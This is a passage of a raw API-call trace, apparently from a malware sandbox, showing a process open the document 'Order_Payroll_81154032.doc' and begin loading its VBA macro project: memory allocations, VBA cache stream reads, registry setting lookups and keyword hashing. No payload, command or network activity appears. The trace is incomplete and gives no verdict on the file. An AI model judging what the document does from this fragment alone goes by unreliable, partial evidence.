GetProcAddress (hModule=0x7feff380000, lpProcName="VarNot") returned 0x7feff409600 [0044.533] GetProcAddress (hModule=0x7feff380000, lpProcName="VarRound") returned 0x7feff3e76a0 [0044.533] GetProcAddress (hModule=0x7feff380000, lpProcName="VarCmp") returned 0x7feff4083f0 [0044.534] GetProcAddress (hModule=0x7feff380000, lpProcName="VarDecAdd") returned 0x7feff3b3070 [0044.534] GetProcAddress (hModule=0x7feff380000, lpProcName="VarDecCmp") returned 0x7feff3bd700 [0044.535] GetProcAddress (hModule=0x7feff380000, lpProcName="VarBstrCat") returned 0x7feff3bd890 [0044.535] GetProcAddress (hModule=0x7feff380000, lpProcName="VarCyMulI4") returned 0x7feff39caf0 [0044.535] GetProcAddress (hModule=0x7feff380000, lpProcName="VarBstrCmp") returned 0x7feff3a8a00 [0044.537] IMalloc:Alloc (This=0x7feff045380, cb=0x20) returned 0x7d977f0 [0044.537] GetUserDefaultLCID () returned 0x409 [0044.556] IMalloc:Alloc (This=0x7feff045380, cb=0x3c) returned 0x7fbceb0 [0044.556] IMalloc:Alloc (This=0x7feff045380, cb=0x38) returned 0x7e71090 [0044.556] IMalloc:Alloc (This=0x7feff045380, cb=0x20000*=0x78746341) returned 0x80d6ba0 [0044.557] IMalloc:Alloc (This=0x7feff045380, cb=0x20) returned 0x7d97700 [0044.558] IMalloc:Alloc (This=0x7feff045380, cb=0x7d8) returned 0x7f827e0 [0044.559] IMalloc:Alloc (This=0x7feff045380, cb=0x98) returned 0x7f50fa0 [0044.559] IMalloc:Alloc (This=0x7feff045380, cb=0x20) returned 0x7d97730 [0044.560] IMalloc:Alloc (This=0x7feff045380, cb=0x28) returned 0x7d975b0 [0044.719] lstrcmpiW (lpString1="C:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc", lpString2="") returned 1 [0044.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc", cchWideChar=-1, lpMultiByteStr=0x207880, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc", lpUsedDefaultChar=0x0) returned 53 [0044.719] lstrlenA (lpString="C:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc") returned 52 [0044.719] lstrcpyA (in: lpString1=0x836c750, lpString2="C:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc" | out: lpString1="C:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc") returned="C:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc" [0044.719] SetCursor (hCursor=0x10007) returned 0x10007 [0044.720] GetCurrentThreadId () returned 0x94c [0044.720] GetCurrentThreadId () returned 0x94c [0044.720] IMalloc:Alloc (This=0x7feff045380, cb=0x4) returned 0x80752c0 [0044.720] IMalloc:Alloc (This=0x7feff045380, cb=0xf0) returned 0x80911e0 [0044.720] IMalloc:Alloc (This=0x7feff045380, cb=0x80) returned 0x7f5be10 [0044.720] IMalloc:Alloc (This=0x7feff045380, cb=0x280) returned 0x8078b10 [0044.721] IMalloc:Alloc (This=0x7feff045380, cb=0xa08) returned 0x8124a20 [0044.721] IMalloc:Alloc (This=0x7feff045380, cb=0x1738) returned 0x8125430 [0044.721] GetLocalTime (in: lpSystemTime=0x207088 | out: lpSystemTime=0x207088*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x3, wDay=0x6, wHour=0x10, wMinute=0x29, wSecond=0xa, wMilliseconds=0x1f7)) [0044.721] _ultow_s (in: _Value=0x5e399ea6, _Buffer=0x8078b3a, _BufferCount=0x103, _Radix=16 | out: _Buffer="5e399ea6") returned 0x0 [0044.721] wcsncpy_s (in: _Destination=0x206d50, _SizeInWords=0x108, _Source="*\\Z005e399ea6", _MaxCount=0x106 | out: _Destination="*\\Z005e399ea6") returned 0x0 [0044.721] CharLowerBuffW (in: lpsz="*\\Z005e399ea6", cchLength=0xd | out: lpsz="*\\z005e399ea6") returned 0xd [0044.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z005e399ea6", cchWideChar=14, lpMultiByteStr=0x206c80, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z005e399ea6", lpUsedDefaultChar=0x0) returned 14 [0044.721] wcscpy_s (in: _Destination=0x7f5be30, _SizeInWords=0xe, _Source="*\\Z005e399ea6" | out: _Destination="*\\Z005e399ea6") returned 0x0 [0044.721] wcsncpy_s (in: _Destination=0x206d90, _SizeInWords=0x108, _Source="*\\Z005e399ea6", _MaxCount=0x106 | out: _Destination="*\\Z005e399ea6") returned 0x0 [0044.721] CharLowerBuffW (in: lpsz="*\\Z005e399ea6", cchLength=0xd | out: lpsz="*\\z005e399ea6") returned 0xd [0044.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z005e399ea6", cchWideChar=14, lpMultiByteStr=0x206cc0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z005e399ea6", lpUsedDefaultChar=0x0) returned 14 [0044.722] lstrcpyA (in: lpString1=0x836c790, lpString2="C:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc" | out: lpString1="C:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc") returned="C:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc" [0044.722] lstrcpyA (in: lpString1=0x836c790, lpString2="C:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc" | out: lpString1="C:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc") returned="C:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc" [0044.722] lstrcpyA (in: lpString1=0x836c790, lpString2="C:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc" | out: lpString1="C:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc") returned="C:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc" [0044.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x836c790, cbMultiByte=-1, lpWideCharStr=0x2076f0, cchWideChar=53 | out: lpWideCharStr="C:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc") returned 53 [0044.722] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0044.722] wcscpy_s (in: _Destination=0x207496, _SizeInWords=0x105, _Source="C:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc" | out: _Destination="C:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc") returned 0x0 [0044.722] wcsncpy_s (in: _Destination=0x2070b0, _SizeInWords=0x108, _Source="*\\Z005e399ea6", _MaxCount=0x106 | out: _Destination="*\\Z005e399ea6") returned 0x0 [0044.722] CharLowerBuffW (in: lpsz="*\\Z005e399ea6", cchLength=0xd | out: lpsz="*\\z005e399ea6") returned 0xd [0044.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z005e399ea6", cchWideChar=14, lpMultiByteStr=0x206fe0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z005e399ea6", lpUsedDefaultChar=0x0) returned 14 [0044.722] _wcsicmp (_String1="*\\Z005e399ea6", _String2="*\\Z005e399ea6") returned 0 [0044.722] wcsncpy_s (in: _Destination=0x2070b0, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc") returned 0x0 [0044.722] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc", cchLength=0x37 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\order_payroll_81154032.doc") returned 0x37 [0044.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\order_payroll_81154032.doc", cchWideChar=56, lpMultiByteStr=0x206fe0, cbMultiByte=112, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\order_payroll_81154032.doc", lpUsedDefaultChar=0x0) returned 56 [0044.722] IMalloc:Realloc (This=0x7feff045380, pv=0x7f5be10, cb=0x100) returned 0x81092c0 [0044.722] wcscpy_s (in: _Destination=0x8109300, _SizeInWords=0x38, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc" | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc") returned 0x0 [0044.722] wcsncpy_s (in: _Destination=0x2070b0, _SizeInWords=0x108, _Source="*\\Z005e399ea6", _MaxCount=0x106 | out: _Destination="*\\Z005e399ea6") returned 0x0 [0044.722] CharLowerBuffW (in: lpsz="*\\Z005e399ea6", cchLength=0xd | out: lpsz="*\\z005e399ea6") returned 0xd [0044.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z005e399ea6", cchWideChar=14, lpMultiByteStr=0x206fe0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z005e399ea6", lpUsedDefaultChar=0x0) returned 14 [0044.722] _wcsicmp (_String1="*\\Z005e399ea6", _String2="*\\Z005e399ea6") returned 0 [0044.722] wcsncpy_s (in: _Destination=0x2070f0, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc") returned 0x0 [0044.722] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc", cchLength=0x37 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\order_payroll_81154032.doc") returned 0x37 [0044.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\order_payroll_81154032.doc", cchWideChar=56, lpMultiByteStr=0x207020, cbMultiByte=112, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\order_payroll_81154032.doc", lpUsedDefaultChar=0x0) returned 56 [0044.722] wcscpy_s (in: _Destination=0x8078b30, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc" | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc") returned 0x0 [0044.722] CExposedDocFile::AddRef () returned 0x2 [0044.722] CExposedDocFile::OpenStorage () returned 0x0 [0044.722] CExposedDocFile::AddRef () returned 0x2 [0044.723] IMalloc:Alloc (This=0x7feff045380, cb=0x84) returned 0x7f5be10 [0044.723] wcscpy_s (in: _Destination=0x7f5be80, _SizeInWords=0x7, _Source="__SRP_" | out: _Destination="__SRP_") returned 0x0 [0044.723] wcscpy_s (in: _Destination=0x206990, _SizeInWords=0x40, _Source="__SRP_" | out: _Destination="__SRP_") returned 0x0 [0044.723] _ltow_s (in: _Value=0, _Buffer=0x20699c, _BufferCount=0x3a, _Radix=16 | out: _Buffer="0") returned 0x0 [0044.723] CExposedDocFile::OpenStream () returned 0x0 [0044.723] IMalloc:Alloc (This=0x7feff045380, cb=0x420) returned 0x8126b70 [0044.723] CExposedStream::AddRef () returned 0x2 [0044.723] CExposedStream::Release () returned 0x1 [0044.723] CExposedStream::Read () returned 0x0 [0044.724] CExposedStream::Seek () returned 0x0 [0044.724] CExposedStream::Release () returned 0x0 [0044.724] IMalloc:Free (This=0x7feff045380, pv=0x8126b70) [0044.724] IMalloc:Free (This=0x7feff045380, pv=0x7f5be10) [0044.724] longjmp () [0044.805] IMalloc:Alloc (This=0x7feff045380, cb=0x84) returned 0x7f5be10 [0044.805] wcscpy_s (in: _Destination=0x7f5be80, _SizeInWords=0x7, _Source="__SRP_" | out: _Destination="__SRP_") returned 0x0 [0044.805] IMalloc:Realloc (This=0x7feff045380, pv=0x0, cb=0x180) returned 0x7fa2000 [0044.806] IMalloc:Alloc (This=0x7feff045380, cb=0xb8) returned 0x26fe290 [0044.806] IMalloc:Alloc (This=0x7feff045380, cb=0xb8) returned 0x26fe1d0 [0044.806] IMalloc:Alloc (This=0x7feff045380, cb=0x230) returned 0x7fd4b70 [0044.806] IMalloc:Realloc (This=0x7feff045380, pv=0x0, cb=0x80) returned 0x8119c50 [0044.806] IMalloc:Alloc (This=0x7feff045380, cb=0x230) returned 0x7fd4dc0 [0044.806] IMalloc:Alloc (This=0x7feff045380, cb=0x230) returned 0x7fd5010 [0044.806] IMalloc:Alloc (This=0x7feff045380, cb=0x28) returned 0x7e02420 [0044.812] IMalloc:Alloc (This=0x7feff045380, cb=0x10) returned 0x8003530 [0044.812] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x20698c, cchData=6 | out: lpLCData="1252") returned 5 [0044.812] atoi (_Str="1252") returned 1252 [0044.812] GetLocalTime (in: lpSystemTime=0x206980 | out: lpSystemTime=0x206980*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x3, wDay=0x6, wHour=0x10, wMinute=0x29, wSecond=0xa, wMilliseconds=0x245)) [0044.813] IMalloc:Alloc (This=0x7feff045380, cb=0x80) returned 0x8119ce0 [0044.813] IMalloc:Alloc (This=0x7feff045380, cb=0x0) returned 0x80752d0 [0044.813] IMalloc:Alloc (This=0x7feff045380, cb=0x80) returned 0x8119d70 [0044.813] IMalloc:Alloc (This=0x7feff045380, cb=0x20) returned 0x7e01dc0 [0044.813] IMalloc:Alloc (This=0x7feff045380, cb=0x80) returned 0x8119e00 [0044.813] IMalloc:Realloc (This=0x7feff045380, pv=0x8119e00, cb=0x280) returned 0x8078da0 [0044.813] IMalloc:Alloc (This=0x7feff045380, cb=0x0) returned 0x8075240 [0044.813] IMalloc:Alloc (This=0x7feff045380, cb=0x0) returned 0x8075300 [0044.813] strcpy_s (in: _Dst=0x206760, _DstSize=0xc8, _Src="Software\\Microsoft\\VBA\\" | out: _Dst="Software\\Microsoft\\VBA\\") returned 0x0 [0044.813] strcat_s (in: _Destination="Software\\Microsoft\\VBA\\", _SizeInBytes=0xc8, _Source="7.1\\Common" | out: _Destination="Software\\Microsoft\\VBA\\7.1\\Common") returned 0x0 [0044.813] RegCreateKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x7fee40704a8, lpdwDisposition=0x0 | out: phkResult=0x7fee40704a8*=0x9dc, lpdwDisposition=0x0) returned 0x0 [0044.814] RegQueryValueExA (in: hKey=0x9dc, lpValueName="RequireDeclaration", lpReserved=0x0, lpType=0x206838, lpData=0x206830, lpcbData=0x206834*=0x4 | out: lpType=0x206838*=0x0, lpData=0x206830*=0xfd, lpcbData=0x206834*=0x4) returned 0x2 [0044.814] RegQueryValueExA (in: hKey=0x9dc, lpValueName="CompileOnDemand", lpReserved=0x0, lpType=0x206838, lpData=0x206830, lpcbData=0x206834*=0x4 | out: lpType=0x206838*=0x0, lpData=0x206830*=0x0, lpcbData=0x206834*=0x4) returned 0x2 [0044.814] RegQueryValueExA (in: hKey=0x9dc, lpValueName="NotifyUserBeforeStateLoss", lpReserved=0x0, lpType=0x206838, lpData=0x206830, lpcbData=0x206834*=0x4 | out: lpType=0x206838*=0x0, lpData=0x206830*=0x1, lpcbData=0x206834*=0x4) returned 0x2 [0044.814] RegQueryValueExA (in: hKey=0x9dc, lpValueName="BackGroundCompile", lpReserved=0x0, lpType=0x206838, lpData=0x206830, lpcbData=0x206834*=0x4 | out: lpType=0x206838*=0x0, lpData=0x206830*=0x0, lpcbData=0x206834*=0x4) returned 0x2 [0044.814] RegQueryValueExA (in: hKey=0x9dc, lpValueName="BreakOnAllErrors", lpReserved=0x0, lpType=0x206838, lpData=0x206830, lpcbData=0x206834*=0x4 | out: lpType=0x206838*=0x0, lpData=0x206830*=0xff, lpcbData=0x206834*=0x4) returned 0x2 [0044.814] RegQueryValueExA (in: hKey=0x9dc, lpValueName="BreakOnServerErrors", lpReserved=0x0, lpType=0x206838, lpData=0x206830, lpcbData=0x206834*=0x4 | out: lpType=0x206838*=0x0, lpData=0x206830*=0x0, lpcbData=0x206834*=0x4) returned 0x2 [0044.814] RegCloseKey (hKey=0x9dc) returned 0x0 [0044.814] IMalloc:Alloc (This=0x7feff045380, cb=0xc0) returned 0x809c860 [0044.814] IMalloc:Alloc (This=0x7feff045380, cb=0xc0) returned 0x809cba0 [0044.815] IMalloc:Alloc (This=0x7feff045380, cb=0x1300) returned 0x8126b70 [0044.815] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x2da0000 [0044.816] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x2000, flProtect=0x4) returned 0x2db0000 [0044.817] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Left") returned 0x107be5 [0044.817] IMalloc:Realloc (This=0x7feff045380, pv=0x0, cb=0x30) returned 0x7d53fd0 [0044.817] VirtualAlloc (lpAddress=0x0, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x2df0000 [0044.817] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Object") returned 0x102ec1 [0044.817] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2e00000 [0044.818] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x2e90000 [0044.818] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x30a0000 [0044.819] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Intrinsics") returned 0x109464 [0044.820] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x30b0000 [0044.821] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unknown") returned 0x10a11d [0044.821] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="") returned 0x10c0b3 [0044.821] CExposedDocFile::OpenStream () returned 0x0 [0044.821] IMalloc:Alloc (This=0x7feff045380, cb=0x420) returned 0x8127e80 [0044.821] CExposedStream::AddRef () returned 0x2 [0044.821] CExposedStream::Release () returned 0x1 [0044.821] CExposedStream::Read () returned 0x0 [0044.822] GetProcAddress (hModule=0x7fee34b0000, lpProcName=0x7fee403b088) returned 0x7fee34bfcd0 [0044.822] VirtualAlloc (lpAddress=0x0, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x30c0000 [0044.822] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x2000, flProtect=0x4) returned 0x3300000 [0044.823] CExposedDocFile::CreateStream () returned 0x0 [0044.823] IMalloc:Alloc (This=0x7feff045380, cb=0x420) returned 0x81282b0 [0044.823] CExposedStream::AddRef () returned 0x2 [0044.823] CExposedStream::Release () returned 0x1 [0044.823] CExposedStream::Release () returned 0x0 [0044.823] IMalloc:Free (This=0x7feff045380, pv=0x81282b0) [0044.823] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="0") returned 0x101047 [0044.823] IMalloc:Realloc (This=0x7feff045380, pv=0x0, cb=0x30) returned 0x7d53f50 [0044.823] VirtualAlloc (lpAddress=0x0, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x30d0000 [0044.824] VirtualAlloc (lpAddress=0x3300000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x3300000 [0044.824] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Abs") returned 0x1072bc [0044.824] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Access") returned 0x101d98 [0044.824] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AddressOf") returned 0x10e252 [0044.824] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Alias") returned 0x10bf6d [0044.825] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="And") returned 0x107469 [0044.825] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Any") returned 0x10747a [0044.825] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Append") returned 0x108f83 [0044.825] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Array") returned 0x109183 [0044.825] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0044.825] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Assert") returned 0x1096e9 [0044.825] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="B") returned 0x101059 [0044.825] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Base") returned 0x10afa9 [0044.825] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BF") returned 0x105ca5 [0044.825] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Binary") returned 0x1008a0 [0044.825] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Boolean") returned 0x10978e [0044.825] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByRef") returned 0x1074ef [0044.825] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Byte") returned 0x101a83 [0044.825] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByVal") returned 0x1089c5 [0044.825] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Call") returned 0x10744b [0044.825] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Case") returned 0x107547 [0044.825] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CBool") returned 0x104c74 [0044.825] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CByte") returned 0x106d3c [0044.825] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CCur") returned 0x108050 [0044.825] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDate") returned 0x108dc3 [0044.825] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDec") returned 0x10834a [0044.825] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDbl") returned 0x1082e4 [0044.825] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDecl") returned 0x10a0b9 [0044.825] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ChDir") returned 0x10b2fb [0044.825] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CInt") returned 0x109f65 [0044.825] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Circle") returned 0x103fd1 [0044.825] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CLng") returned 0x10af63 [0044.826] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Close") returned 0x1005ab [0044.826] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Compare") returned 0x10af82 [0044.826] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Const") returned 0x10517a [0044.826] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CSng") returned 0x10d4d2 [0044.826] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CStr") returned 0x10d5bb [0044.826] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CurDir") returned 0x101bab [0044.826] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CurDir$") returned 0x10f7cc [0044.826] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CurDir") returned 0x101bab [0044.826] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CVar") returned 0x10e307 [0044.826] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CVDate") returned 0x10cfd6 [0044.826] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CVErr") returned 0x108902 [0044.826] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Currency") returned 0x10f106 [0044.826] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Database") returned 0x10eec7 [0044.826] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Date") returned 0x103b0a [0044.826] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Date$") returned 0x1031c7 [0044.826] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Date") returned 0x103b0a [0044.826] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Debug") returned 0x10eaee [0044.826] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Decimal") returned 0x1036dd [0044.826] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Declare") returned 0x104a38 [0044.826] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefBool") returned 0x1091ad [0044.826] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefByte") returned 0x10b275 [0044.826] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefCur") returned 0x10cc45 [0044.826] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefDate") returned 0x10d2fc [0044.826] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefDec") returned 0x10cf3f [0044.826] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefDbl") returned 0x10ced9 [0044.826] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefInt") returned 0x10eb5a [0044.826] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefLng") returned 0x10fb58 [0044.826] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefObj") returned 0x10096b [0044.826] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefSng") returned 0x102088 [0044.826] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefStr") returned 0x102171 [0044.826] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefVar") returned 0x102ebd [0044.826] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0044.826] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dir") returned 0x1083c9 [0044.826] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dir$") returned 0x106567 [0044.826] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dir") returned 0x1083c9 [0044.827] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Do") returned 0x105cf8 [0044.827] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DoEvents") returned 0x109634 [0044.827] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Double") returned 0x100d99 [0044.827] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Each") returned 0x10fe75 [0044.827] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Else") returned 0x103b56 [0044.827] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ElseIf") returned 0x10f307 [0044.827] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Empty") returned 0x10f4f1 [0044.827] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0044.827] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EndIf") returned 0x1078bd [0044.827] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Enum") returned 0x10465a [0044.827] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Eqv") returned 0x108a4e [0044.827] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Erase") returned 0x1080da [0044.827] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error") returned 0x10db3c [0044.827] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error$") returned 0x10cf60 [0044.827] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error") returned 0x10db3c [0044.827] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Event") returned 0x10ac4b [0044.827] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Exit") returned 0x107a1f [0044.827] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Explicit") returned 0x10edcb [0044.827] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="F") returned 0x10105d [0044.827] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0044.827] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Fix") returned 0x108e81 [0044.827] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="For") returned 0x108f59 [0044.827] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Format") returned 0x102337 [0044.827] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Format$") returned 0x10efc7 [0044.827] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Format") returned 0x102337 [0044.827] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FreeFile") returned 0x10483a [0044.827] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Friend") returned 0x10bd1c [0044.827] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0044.827] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Get") returned 0x109342 [0044.827] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Global") returned 0x10f88f 